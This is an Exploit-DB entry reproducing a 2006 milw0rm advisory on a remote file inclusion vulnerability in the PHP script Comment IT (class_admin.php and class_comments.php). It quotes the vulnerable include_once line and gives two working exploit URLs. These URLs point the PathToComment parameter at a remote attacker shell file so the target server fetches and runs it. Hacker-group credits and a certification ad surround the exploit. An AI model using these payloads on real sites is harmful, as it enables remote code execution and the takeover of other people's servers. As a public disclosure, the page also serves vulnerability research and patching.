CommentIT - 'PathToComment' Remote File Inclusion

EDB-ID:

2648

CVE:

N/A




Platform:

PHP

Date:

2006-10-25


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Comment IT  (class_admin.php , class_comments.php)  Remot File Include Vulnerability

Found By : CoLd Zero  [ Wasem898 ]

Palestine Muslim Hacker's

######################################################
#
#           [ Comment IT ]
#
# Class:     File Include Vulnerability
# Published  2006-10-24
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://www.comscripts.com/scripts/php.comment-it.623.html
# Author:    Cold Zero
# Contact:   ip.123.456.78.90@hotmail.com
#
######################################################

file's ;

class_admin.php
class_comments.php
======================================================
Vuln Code

include_once ($PathToComment."/classes/class_db.php");

=======================================================

Exploit :

Http:// www.Victem.0 / [Comment IT_path] /classes/class_admin.php?PathToComment=http://ColdZero-Shell.txt

Http:// www.Victem.0 / [Comment IT_path] /classes/class_comments.php?PathToComment=http://ColdZero-Shell.txt



----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] ]organza[

---- GreeTz: All www.4azhar.Com Members

Cont :  ip.123.456.78.90@hotmail.com

--------------------------------------||  Viva Palestine ||-----------------------------------------

# milw0rm.com [2006-10-25]